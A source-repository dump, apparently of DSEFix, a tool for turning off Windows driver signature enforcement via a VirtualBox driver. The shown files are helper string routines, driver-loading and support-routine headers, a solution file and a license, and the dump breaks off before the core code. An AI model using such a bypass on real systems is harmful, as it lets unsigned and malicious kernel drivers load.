├── Compiled └── dsefix.exe ├── Source └── DSEFix │ ├── Resource.rc │ ├── dsefix.vcxproj.user │ ├── minirtl │ ├── _strend.c │ ├── _strlen.c │ ├── _strcat.c │ ├── strtou64.c │ ├── _strcpy.c │ ├── ultohex.c │ ├── ultostr.c │ ├── _strcmp.c │ ├── u64tohex.c │ ├── _strcmpi.c │ ├── _strncpy.c │ ├── cmdline.h │ ├── _strncmp.c │ ├── rtltypes.h │ ├── _strncmpi.c │ ├── strtoi.c │ ├── strtoi64.c │ ├── cmdline.c │ └── minirtl.h │ ├── resource.h │ ├── dsefix.sln │ ├── cui │ ├── cui.h │ └── cui.c │ ├── instdrv.h │ ├── sup.h │ ├── hde │ ├── pstdint.h │ ├── hde64.h │ ├── table64.h │ └── hde64.c │ ├── global.h │ ├── dsefix.vcxproj.filters │ ├── instdrv.c │ ├── dsefix.vcxproj │ ├── vbox.h │ ├── sup.c │ └── main.c ├── LICENSE.md ├── README.md └── DSEFIX.sha256 /Compiled/dsefix.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/DSEFix/HEAD/Compiled/dsefix.exe -------------------------------------------------------------------------------- /Source/DSEFix/Resource.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/DSEFix/HEAD/Source/DSEFix/Resource.rc -------------------------------------------------------------------------------- /Source/DSEFix/dsefix.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Source/DSEFix/minirtl/_strend.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strend_a(const char *s) 4 | { 5 | if ( s==0 ) 6 | return 0; 7 | 8 | while ( *s!=0 ) 9 | s++; 10 | 11 | return (char *)s; 12 | } 13 | 14 | wchar_t *_strend_w(const wchar_t *s) 15 | { 16 | if ( s==0 ) 17 | return 0; 18 | 19 | while ( *s!=0 ) 20 | s++; 21 | 22 | return (wchar_t *)s; 23 | } 24 | -------------------------------------------------------------------------------- /Source/DSEFix/minirtl/_strlen.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t _strlen_a(const char *s) 4 | { 5 | char *s0 = (char *)s; 6 | 7 | if ( s==0 ) 8 | return 0; 9 | 10 | while ( *s!=0 ) 11 | s++; 12 | 13 | return (s-s0); 14 | } 15 | 16 | size_t _strlen_w(const wchar_t *s) 17 | { 18 | wchar_t *s0 = (wchar_t *)s; 19 | 20 | if ( s==0 ) 21 | return 0; 22 | 23 | while ( *s!=0 ) 24 | s++; 25 | 26 | return (s-s0); 27 | } 28 | -------------------------------------------------------------------------------- /Source/DSEFix/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by Resource.rc 4 | 5 | // Next default values for new objects 6 | // 7 | #ifdef APSTUDIO_INVOKED 8 | #ifndef APSTUDIO_READONLY_SYMBOLS 9 | #define _APS_NEXT_RESOURCE_VALUE 101 10 | #define _APS_NEXT_COMMAND_VALUE 40001 11 | #define _APS_NEXT_CONTROL_VALUE 1001 12 | #define _APS_NEXT_SYMED_VALUE 101 13 | #endif 14 | #endif 15 | -------------------------------------------------------------------------------- /Source/DSEFix/minirtl/_strcat.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcat_a(char *dest, const char *src) 4 | { 5 | if ( (dest==0) || (src==0) ) 6 | return dest; 7 | 8 | while ( *dest!=0 ) 9 | dest++; 10 | 11 | while ( *src!=0 ) { 12 | *dest = *src; 13 | dest++; 14 | src++; 15 | } 16 | 17 | *dest = 0; 18 | return dest; 19 | } 20 | 21 | wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src) 22 | { 23 | if ( (dest==0) || (src==0) ) 24 | return dest; 25 | 26 | while ( *dest!=0 ) 27 | dest++; 28 | 29 | while ( *src!=0 ) { 30 | *dest = *src; 31 | dest++; 32 | src++; 33 | } 34 | 35 | *dest = 0; 36 | return dest; 37 | } 38 | -------------------------------------------------------------------------------- /Source/DSEFix/minirtl/strtou64.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | unsigned long long strtou64_a(char *s) 4 | { 5 | unsigned long long a = 0; 6 | char c; 7 | 8 | if (s == 0) 9 | return 0; 10 | 11 | while (*s != 0) { 12 | c = *s; 13 | if (_isdigit_w(c)) 14 | a = (a*10)+(c-'0'); 15 | else 16 | break; 17 | s++; 18 | } 19 | return a; 20 | } 21 | 22 | unsigned long long strtou64_w(wchar_t *s) 23 | { 24 | unsigned long long a = 0; 25 | wchar_t c; 26 | 27 | if (s == 0) 28 | return 0; 29 | 30 | while (*s != 0) { 31 | c = *s; 32 | if (_isdigit_w(c)) 33 | a = (a*10)+(c-L'0'); 34 | else 35 | break; 36 | s++; 37 | } 38 | return a; 39 | } 40 | -------------------------------------------------------------------------------- /Source/DSEFix/minirtl/_strcpy.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcpy_a(char *dest, const char *src) 4 | { 5 | char *p; 6 | 7 | if ( (dest==0) || (src==0) ) 8 | return dest; 9 | 10 | if (dest == src) 11 | return dest; 12 | 13 | p = dest; 14 | while ( *src!=0 ) { 15 | *p = *src; 16 | p++; 17 | src++; 18 | } 19 | 20 | *p = 0; 21 | return dest; 22 | } 23 | 24 | wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src) 25 | { 26 | wchar_t *p; 27 | 28 | if ((dest == 0) || (src == 0)) 29 | return dest; 30 | 31 | if (dest == src) 32 | return dest; 33 | 34 | p = dest; 35 | while ( *src!=0 ) { 36 | *p = *src; 37 | p++; 38 | src++; 39 | } 40 | 41 | *p = 0; 42 | return dest; 43 | } 44 | -------------------------------------------------------------------------------- /Source/DSEFix/minirtl/ultohex.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t ultohex_a(unsigned long x, char *s) 4 | { 5 | char p; 6 | size_t c; 7 | 8 | if (s==0) 9 | return 8; 10 | 11 | for (c=0; c<8; c++) { 12 | p = (char)(x & 0xf); 13 | x >>= 4; 14 | 15 | if (p<10) 16 | p += '0'; 17 | else 18 | p = 'A' + (p-10); 19 | 20 | s[7-c] = p; 21 | } 22 | 23 | s[8] = 0; 24 | return 8; 25 | } 26 | 27 | size_t ultohex_w(unsigned long x, wchar_t *s) 28 | { 29 | wchar_t p; 30 | size_t c; 31 | 32 | if (s==0) 33 | return 8; 34 | 35 | for (c=0; c<8; c++) { 36 | p = (wchar_t)(x & 0xf); 37 | x >>= 4; 38 | 39 | if (p<10) 40 | p += L'0'; 41 | else 42 | p = L'A' + (p-10); 43 | 44 | s[7-c] = p; 45 | } 46 | 47 | s[8] = 0; 48 | return 8; 49 | } 50 | -------------------------------------------------------------------------------- /Source/DSEFix/minirtl/ultostr.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t ultostr_a(unsigned long x, char *s) 4 | { 5 | unsigned long t=x; 6 | size_t i, r=1; 7 | 8 | while ( t >= 10 ) { 9 | t /= 10; 10 | r++; 11 | } 12 | 13 | if (s == 0) 14 | return r; 15 | 16 | for (i = r; i != 0; i--) { 17 | s[i-1] = (char)(x % 10) + '0'; 18 | x /= 10; 19 | } 20 | 21 | s[r] = (char)0; 22 | return r; 23 | } 24 | 25 | size_t ultostr_w(unsigned long x, wchar_t *s) 26 | { 27 | unsigned long t=x; 28 | size_t i, r=1; 29 | 30 | while ( t >= 10 ) { 31 | t /= 10; 32 | r++; 33 | } 34 | 35 | if (s == 0) 36 | return r; 37 | 38 | for (i = r; i != 0; i--) { 39 | s[i-1] = (wchar_t)(x % 10) + L'0'; 40 | x /= 10; 41 | } 42 | 43 | s[r] = (wchar_t)0; 44 | return r; 45 | } 46 | -------------------------------------------------------------------------------- /Source/DSEFix/minirtl/_strcmp.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | int _strcmp_a(const char *s1, const char *s2) 4 | { 5 | char c1, c2; 6 | 7 | if ( s1==s2 ) 8 | return 0; 9 | 10 | if ( s1==0 ) 11 | return -1; 12 | 13 | if ( s2==0 ) 14 | return 1; 15 | 16 | do { 17 | c1 = *s1; 18 | c2 = *s2; 19 | s1++; 20 | s2++; 21 | } while ( (c1 != 0) && (c1 == c2) ); 22 | 23 | return (int)(c1 - c2); 24 | } 25 | 26 | int _strcmp_w(const wchar_t *s1, const wchar_t *s2) 27 | { 28 | wchar_t c1, c2; 29 | 30 | if ( s1==s2 ) 31 | return 0; 32 | 33 | if ( s1==0 ) 34 | return -1; 35 | 36 | if ( s2==0 ) 37 | return 1; 38 | 39 | do { 40 | c1 = *s1; 41 | c2 = *s2; 42 | s1++; 43 | s2++; 44 | } while ( (c1 != 0) && (c1 == c2) ); 45 | 46 | return (int)(c1 - c2); 47 | } 48 | -------------------------------------------------------------------------------- /Source/DSEFix/minirtl/u64tohex.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t u64tohex_a(unsigned long long x, char *s) 4 | { 5 | char p; 6 | size_t c; 7 | 8 | if (s==0) 9 | return 16; 10 | 11 | for (c=0; c<16; c++) { 12 | p = (char)(x & 0xf); 13 | x >>= 4; 14 | 15 | if (p<10) 16 | p += '0'; 17 | else 18 | p = 'A' + (p-10); 19 | 20 | s[15-c] = p; 21 | } 22 | 23 | s[16] = 0; 24 | return 16; 25 | } 26 | 27 | size_t u64tohex_w(unsigned long long x, wchar_t *s) 28 | { 29 | wchar_t p; 30 | size_t c; 31 | 32 | if (s==0) 33 | return 16; 34 | 35 | for (c = 0; c<16; c++) { 36 | p = (wchar_t)(x & 0xf); 37 | x >>= 4; 38 | 39 | if (p<10) 40 | p += L'0'; 41 | else 42 | p = L'A' + (p-10); 43 | 44 | s[15-c] = p; 45 | } 46 | 47 | s[16] = 0; 48 | return 16; 49 | } 50 | -------------------------------------------------------------------------------- /Source/DSEFix/minirtl/_strcmpi.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | int _strcmpi_a(const char *s1, const char *s2) 4 | { 5 | char c1, c2; 6 | 7 | if ( s1==s2 ) 8 | return 0; 9 | 10 | if ( s1==0 ) 11 | return -1; 12 | 13 | if ( s2==0 ) 14 | return 1; 15 | 16 | do { 17 | c1 = locase_a(*s1); 18 | c2 = locase_a(*s2); 19 | s1++; 20 | s2++; 21 | } while ( (c1 != 0) && (c1 == c2) ); 22 | 23 | return (int)(c1 - c2); 24 | } 25 | 26 | int _strcmpi_w(const wchar_t *s1, const wchar_t *s2) 27 | { 28 | wchar_t c1, c2; 29 | 30 | if ( s1==s2 ) 31 | return 0; 32 | 33 | if ( s1==0 ) 34 | return -1; 35 | 36 | if ( s2==0 ) 37 | return 1; 38 | 39 | do { 40 | c1 = locase_w(*s1); 41 | c2 = locase_w(*s2); 42 | s1++; 43 | s2++; 44 | } while ( (c1 != 0) && (c1 == c2) ); 45 | 46 | return (int)(c1 - c2); 47 | } 48 | -------------------------------------------------------------------------------- /Source/DSEFix/minirtl/_strncpy.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc) 4 | { 5 | char *p; 6 | 7 | if ( (dest==0) || (src==0) || (ccdest==0) ) 8 | return dest; 9 | 10 | ccdest--; 11 | p = dest; 12 | 13 | while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) { 14 | *p = *src; 15 | p++; 16 | src++; 17 | ccdest--; 18 | ccsrc--; 19 | } 20 | 21 | *p = 0; 22 | return dest; 23 | } 24 | 25 | wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc) 26 | { 27 | wchar_t *p; 28 | 29 | if ( (dest==0) || (src==0) || (ccdest==0) ) 30 | return dest; 31 | 32 | ccdest--; 33 | p = dest; 34 | 35 | while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) { 36 | *p = *src; 37 | p++; 38 | src++; 39 | ccdest--; 40 | ccsrc--; 41 | } 42 | 43 | *p = 0; 44 | return dest; 45 | } 46 | -------------------------------------------------------------------------------- /Source/DSEFix/minirtl/cmdline.h: -------------------------------------------------------------------------------- 1 | #ifndef _CMDLINEH_ 2 | #define _CMDLINEH_ 3 | 4 | BOOL GetCommandLineParamW( 5 | IN LPCWSTR CmdLine, 6 | IN ULONG ParamIndex, 7 | OUT LPWSTR Buffer, 8 | IN ULONG BufferSize, 9 | OUT PULONG ParamLen 10 | ); 11 | 12 | BOOL GetCommandLineParamA( 13 | IN LPCSTR CmdLine, 14 | IN ULONG ParamIndex, 15 | OUT LPSTR Buffer, 16 | IN ULONG BufferSize, 17 | OUT PULONG ParamLen 18 | ); 19 | 20 | char *ExtractFilePathA(const char *FileName, char *FilePath); 21 | wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath); 22 | 23 | #ifdef UNICODE 24 | 25 | #define ExtractFilePath ExtractFilePathW 26 | #define GetCommandLineParam GetCommandLineParamW 27 | 28 | #else // ANSI 29 | 30 | #define ExtractFilePath ExtractFilePathA 31 | #define GetCommandLineParam GetCommandLineParamA 32 | 33 | #endif 34 | 35 | #endif /* _CMDLINEH_ */ 36 | -------------------------------------------------------------------------------- /Source/DSEFix/minirtl/_strncmp.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | int _strncmp_a(const char *s1, const char *s2, size_t cchars) 4 | { 5 | char c1, c2; 6 | 7 | if ( s1==s2 ) 8 | return 0; 9 | 10 | if ( s1==0 ) 11 | return -1; 12 | 13 | if ( s2==0 ) 14 | return 1; 15 | 16 | if ( cchars==0 ) 17 | return 0; 18 | 19 | do { 20 | c1 = *s1; 21 | c2 = *s2; 22 | s1++; 23 | s2++; 24 | cchars--; 25 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) ); 26 | 27 | return (int)(c1 - c2); 28 | } 29 | 30 | int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars) 31 | { 32 | wchar_t c1, c2; 33 | 34 | if ( s1==s2 ) 35 | return 0; 36 | 37 | if ( s1==0 ) 38 | return -1; 39 | 40 | if ( s2==0 ) 41 | return 1; 42 | 43 | if ( cchars==0 ) 44 | return 0; 45 | 46 | do { 47 | c1 = *s1; 48 | c2 = *s2; 49 | s1++; 50 | s2++; 51 | cchars--; 52 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) ); 53 | 54 | return (int)(c1 - c2); 55 | } 56 | -------------------------------------------------------------------------------- /Source/DSEFix/minirtl/rtltypes.h: -------------------------------------------------------------------------------- 1 | #ifndef _WCHAR_T_DEFINED 2 | typedef unsigned short wchar_t; 3 | #define _WCHAR_T_DEFINED 4 | #endif /* _WCHAR_T_DEFINED */ 5 | 6 | #ifndef _SIZE_T_DEFINED 7 | #ifdef _WIN64 8 | typedef unsigned __int64 size_t; 9 | #else /* _WIN64 */ 10 | typedef __w64 unsigned int size_t; 11 | #endif /* _WIN64 */ 12 | #define _SIZE_T_DEFINED 13 | #endif /* _SIZE_T_DEFINED */ 14 | 15 | __forceinline char locase_a(char c) 16 | { 17 | if ((c >= 'A') && (c <= 'Z')) 18 | return c + 0x20; 19 | else 20 | return c; 21 | } 22 | 23 | __forceinline wchar_t locase_w(wchar_t c) 24 | { 25 | if ((c >= 'A') && (c <= 'Z')) 26 | return c + 0x20; 27 | else 28 | return c; 29 | } 30 | 31 | __forceinline char byteabs(char x) { 32 | if (x < 0) 33 | return -x; 34 | return x; 35 | } 36 | 37 | __forceinline int _isdigit_a(char x) { 38 | return ((x >= '0') && (x <= '9')); 39 | } 40 | 41 | __forceinline int _isdigit_w(wchar_t x) { 42 | return ((x >= L'0') && (x <= L'9')); 43 | } 44 | -------------------------------------------------------------------------------- /Source/DSEFix/dsefix.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dsefix", "dsefix.vcxproj", "{BF7B9380-9160-4E08-8979-A9A44A3343AA}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {BF7B9380-9160-4E08-8979-A9A44A3343AA}.Debug|x64.ActiveCfg = Debug|x64 15 | {BF7B9380-9160-4E08-8979-A9A44A3343AA}.Debug|x64.Build.0 = Debug|x64 16 | {BF7B9380-9160-4E08-8979-A9A44A3343AA}.Release|x64.ActiveCfg = Release|x64 17 | {BF7B9380-9160-4E08-8979-A9A44A3343AA}.Release|x64.Build.0 = Release|x64 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /Source/DSEFix/minirtl/_strncmpi.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | int _strncmpi_a(const char *s1, const char *s2, size_t cchars) 4 | { 5 | char c1, c2; 6 | 7 | if ( s1==s2 ) 8 | return 0; 9 | 10 | if ( s1==0 ) 11 | return -1; 12 | 13 | if ( s2==0 ) 14 | return 1; 15 | 16 | if ( cchars==0 ) 17 | return 0; 18 | 19 | do { 20 | c1 = locase_a(*s1); 21 | c2 = locase_a(*s2); 22 | s1++; 23 | s2++; 24 | cchars--; 25 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) ); 26 | 27 | return (int)(c1 - c2); 28 | } 29 | 30 | int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars) 31 | { 32 | wchar_t c1, c2; 33 | 34 | if ( s1==s2 ) 35 | return 0; 36 | 37 | if ( s1==0 ) 38 | return -1; 39 | 40 | if ( s2==0 ) 41 | return 1; 42 | 43 | if ( cchars==0 ) 44 | return 0; 45 | 46 | do { 47 | c1 = locase_w(*s1); 48 | c2 = locase_w(*s2); 49 | s1++; 50 | s2++; 51 | cchars--; 52 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) ); 53 | 54 | return (int)(c1 - c2); 55 | } 56 | -------------------------------------------------------------------------------- /Source/DSEFix/minirtl/strtoi.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | int strtoi_a(char *s) 4 | { 5 | int a = 0, sign; 6 | char c; 7 | 8 | if (s == 0) 9 | return 0; 10 | 11 | switch (*s) { 12 | case '-': 13 | s++; 14 | sign = -1; 15 | break; 16 | 17 | case '+': 18 | s++; 19 | sign = 1; 20 | break; 21 | 22 | default: 23 | sign = 1; 24 | } 25 | 26 | while (*s != 0) { 27 | c = *s; 28 | if (_isdigit_a(c)) 29 | a = (a*10) + (c-'0'); 30 | else 31 | break; 32 | s++; 33 | } 34 | return a*sign; 35 | } 36 | 37 | int strtoi_w(wchar_t *s) 38 | { 39 | int a = 0, sign; 40 | wchar_t c; 41 | 42 | if (s == 0) 43 | return 0; 44 | 45 | switch (*s) { 46 | case L'-': 47 | s++; 48 | sign = -1; 49 | break; 50 | 51 | case L'+': 52 | s++; 53 | sign = 1; 54 | break; 55 | 56 | default: 57 | sign = 1; 58 | } 59 | 60 | while (*s != 0) { 61 | c = *s; 62 | if (_isdigit_w(c)) 63 | a = (a*10)+(c-L'0'); 64 | else 65 | break; 66 | s++; 67 | } 68 | return a*sign; 69 | } 70 | -------------------------------------------------------------------------------- /Source/DSEFix/minirtl/strtoi64.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | signed long long strtoi64_a(char *s) 4 | { 5 | signed long long a = 0, sign; 6 | char c; 7 | 8 | if (s == 0) 9 | return 0; 10 | 11 | switch (*s) { 12 | case '-': 13 | s++; 14 | sign = -1; 15 | break; 16 | 17 | case '+': 18 | s++; 19 | sign = 1; 20 | break; 21 | 22 | default: 23 | sign = 1; 24 | } 25 | 26 | while (*s != 0) { 27 | c = *s; 28 | if (_isdigit_a(c)) 29 | a = (a*10) + (c-'0'); 30 | else 31 | break; 32 | s++; 33 | } 34 | return a*sign; 35 | } 36 | 37 | signed long long strtoi64_w(wchar_t *s) 38 | { 39 | signed long long a = 0, sign; 40 | wchar_t c; 41 | 42 | if (s == 0) 43 | return 0; 44 | 45 | switch (*s) { 46 | case L'-': 47 | s++; 48 | sign = -1; 49 | break; 50 | 51 | case L'+': 52 | s++; 53 | sign = 1; 54 | break; 55 | 56 | default: 57 | sign = 1; 58 | } 59 | 60 | while (*s != 0) { 61 | c = *s; 62 | if (_isdigit_w(c)) 63 | a = (a*10)+(c-L'0'); 64 | else 65 | break; 66 | s++; 67 | } 68 | return a*sign; 69 | } 70 | -------------------------------------------------------------------------------- /Source/DSEFix/cui/cui.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2016 - 2017 4 | * 5 | * TITLE: CUI.H 6 | * 7 | * VERSION: 1.10 8 | * 9 | * DATE: 04 Feb 2017 10 | * 11 | * Common header file for console ui. 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 17 | * 18 | *******************************************************************************/ 19 | #pragma once 20 | 21 | VOID cuiPrintTextA( 22 | _In_ HANDLE hOutConsole, 23 | _In_ LPSTR lpText, 24 | _In_ BOOL ConsoleOutputEnabled, 25 | _In_ BOOL UseReturn 26 | ); 27 | 28 | VOID cuiPrintTextW( 29 | _In_ HANDLE hOutConsole, 30 | _In_ LPWSTR lpText, 31 | _In_ BOOL ConsoleOutputEnabled, 32 | _In_ BOOL UseReturn 33 | ); 34 | 35 | #ifdef UNICODE 36 | #define cuiPrintText cuiPrintTextW 37 | #else 38 | #define cuiPrintText cuiPrintTextA 39 | #endif 40 | -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | Copyright (c) DSEFix Project authors 2 | 3 | Redistribution and use in source and binary forms, with or without 4 | modification, are permitted provided that the following conditions are met: 5 | 6 | * Redistributions of source code must retain the above copyright notice, this 7 | list of conditions and the following disclaimer. 8 | 9 | * Redistributions in binary form must reproduce the above copyright notice, 10 | this list of conditions and the following disclaimer in the documentation 11 | and/or other materials provided with the distribution. 12 | 13 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 14 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 15 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 16 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 17 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 18 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 19 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 20 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 21 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 22 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 23 | -------------------------------------------------------------------------------- /Source/DSEFix/instdrv.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2015 - 2016, portions (C) Mark Russinovich, FileMon 4 | * 5 | * TITLE: INSTDRV.H 6 | * 7 | * DATE: 17 July 2016 8 | * 9 | * Common header file for the program SCM usage. 10 | * 11 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 12 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 13 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 14 | * PARTICULAR PURPOSE. 15 | * 16 | *******************************************************************************/ 17 | #pragma once 18 | 19 | BOOL scmInstallDriver( 20 | _In_ SC_HANDLE SchSCManager, 21 | _In_ LPCTSTR DriverName, 22 | _In_opt_ LPCTSTR ServiceExe 23 | ); 24 | 25 | BOOL scmStartDriver( 26 | _In_ SC_HANDLE SchSCManager, 27 | _In_ LPCTSTR DriverName 28 | ); 29 | 30 | BOOL scmOpenDevice( 31 | _In_ LPCTSTR DriverName, 32 | _Inout_opt_ PHANDLE lphDevice 33 | ); 34 | 35 | BOOL scmStopDriver( 36 | _In_ SC_HANDLE SchSCManager, 37 | _In_ LPCTSTR DriverName 38 | ); 39 | 40 | BOOL scmRemoveDriver( 41 | _In_ SC_HANDLE SchSCManager, 42 | _In_ LPCTSTR DriverName 43 | ); 44 | 45 | BOOL scmUnloadDeviceDriver( 46 | _In_ LPCTSTR Name 47 | ); 48 | 49 | BOOL scmLoadDeviceDriver( 50 | _In_ LPCTSTR Name, 51 | _In_opt_ LPCTSTR Path, 52 | _Inout_ PHANDLE lphDevice 53 | ); 54 | -------------------------------------------------------------------------------- /Source/DSEFix/sup.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2014 - 2017 4 | * 5 | * TITLE: SUP.H 6 | * 7 | * VERSION: 1.20 8 | * 9 | * DATE: 18 Apr 2017 10 | * 11 | * Common header file for the program support routines. 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 17 | * 18 | *******************************************************************************/ 19 | #pragma once 20 | 21 | typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam); 22 | 23 | typedef struct _OBJSCANPARAM { 24 | PWSTR Buffer; 25 | ULONG BufferSize; 26 | } OBJSCANPARAM, *POBJSCANPARAM; 27 | 28 | void supCopyMemory( 29 | _Inout_ void *dest, 30 | _In_ size_t ccdest, 31 | _In_ const void *src, 32 | _In_ size_t ccsrc); 33 | 34 | PVOID supGetSystemInfo( 35 | _In_ SYSTEM_INFORMATION_CLASS InfoClass); 36 | 37 | BOOL supBackupVBoxDrv( 38 | _In_ BOOL bRestore); 39 | 40 | DWORD supWriteBufferToFile( 41 | _In_ LPWSTR lpFileName, 42 | _In_ PVOID Buffer, 43 | _In_ DWORD BufferSize); 44 | 45 | BOOL supIsObjectExists( 46 | _In_ LPWSTR RootDirectory, 47 | _In_ LPWSTR ObjectName); 48 | 49 | ULONG_PTR supGetModuleBaseByName( 50 | _In_ LPSTR ModuleName); 51 | 52 | PVOID supMapFile( 53 | _In_ LPWSTR lpFileName, 54 | _Out_ PSIZE_T VirtualSize); 55 | 56 | #define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1) 57 | -------------------------------------------------------------------------------- /Source/DSEFix/hde/pstdint.h: -------------------------------------------------------------------------------- 1 | /* 2 | * MinHook - The Minimalistic API Hooking Library for x64/x86 3 | * Copyright (C) 2009-2015 Tsuda Kageyu. All rights reserved. 4 | * 5 | * Redistribution and use in source and binary forms, with or without 6 | * modification, are permitted provided that the following conditions 7 | * are met: 8 | * 9 | * 1. Redistributions of source code must retain the above copyright 10 | * notice, this list of conditions and the following disclaimer. 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR 16 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 17 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 18 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 19 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 20 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 21 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 22 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 23 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 24 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 25 | */ 26 | 27 | #pragma once 28 | 29 | #include 30 | 31 | // Integer types for HDE. 32 | typedef INT8 int8_t; 33 | typedef INT16 int16_t; 34 | typedef INT32 int32_t; 35 | typedef INT64 int64_t; 36 | typedef UINT8 uint8_t; 37 | typedef UINT16 uint16_t; 38 | typedef UINT32 uint32_t; 39 | typedef UINT64 uint64_t; 40 | -------------------------------------------------------------------------------- /Source/DSEFix/global.h: -------------------------------------------------------------------------------- 1 | 